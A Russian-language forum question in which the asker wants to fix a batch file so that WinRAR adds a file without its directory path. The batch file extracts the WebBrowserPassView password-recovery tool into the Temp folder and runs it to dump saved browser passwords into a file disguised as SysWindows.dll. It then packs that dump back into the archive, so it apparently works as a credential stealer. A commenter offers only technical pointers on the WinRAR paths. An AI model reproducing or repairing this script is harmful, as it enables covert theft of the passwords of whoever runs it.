# Хочу добавить файл в архив из папки Temp через батник

Tags: cmd, bat

Хочу добавить файл в архив из папки Temp через батник без директорий просто файл но добавляется директория а в ней файл, как исправить ?
[image: Схема]

```
@echo off

if EXIST "C:\Programs Files\WinRar\WinRar.exe" (
    set winrar_path="C:\Programs Files\WinRar\WinRar.exe"
    ) else (
        if EXIST "C:\Program Files (x86)\WinRar\WinRar.exe" (
            set winrar_path="C:\Program Files (x86)\WinRar\WinRar.exe"
            ) else (
                goto pathwinrar
                ))

:pathwinrar
set /P winrar_path=Path To WinRar: 
if NOT EXIST "%winrar_path%" goto pathwinrar

%winrar_path% x qwerty.rar WebBrowserPassView_v2.06_CMD.exe %Temp%

%Temp%\WebBrowserPassView_v2.06_CMD.exe /shtml %Temp%\SysWindows.dll /sort 2 /sort ~ 1

%winrar_path% a -r qwerty.rar %Temp%\SysWindows.dll
```

Comment: Во-первых, исполнение Вашего bat-файла в любом случае заставляет пользователя вручную забивать путь к исполнимому файлу winrar.exe. Во-вторых, этот вопрос относится к использованию утилиты WinRAR. В справке к программе в перечне ключей есть указание, как избавиться в архиве от путей добавляемых файлов.